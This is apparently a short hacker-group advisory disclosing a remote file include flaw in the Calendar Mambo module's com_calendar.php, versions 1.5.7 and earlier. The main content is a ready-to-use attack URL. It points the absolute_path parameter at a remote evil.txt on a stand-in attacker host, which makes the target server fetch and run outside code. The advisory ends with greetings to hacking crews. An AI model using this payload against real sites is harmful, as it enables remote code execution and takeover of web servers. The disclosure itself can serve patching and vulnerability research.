|
---------------------------------------------------------------------------------=0D
Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities=0D
---------------------------------------------------------------------------------=0D
=0D
Author : Matdhule=0D
=0D
Contact : matdhule@gmail.com=0D
=0D
Web : http://www.solpotcrew.org/adv/matdhule-adv-calendar.txt=0D
=0D
Application : Calendar Module (com_calendar.php)=0D
=0D
Version : 1.5.7 and prior=0D
=0D
---------------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
=0D
In folder components we found vulnerability script com_calendar.php.=0D
=0D
-----------------------com_calendar.php---------------------------------=0D
http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt?=0D
=0D
---------------------------------------------------------------------------------=0D
=0D
Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet=0D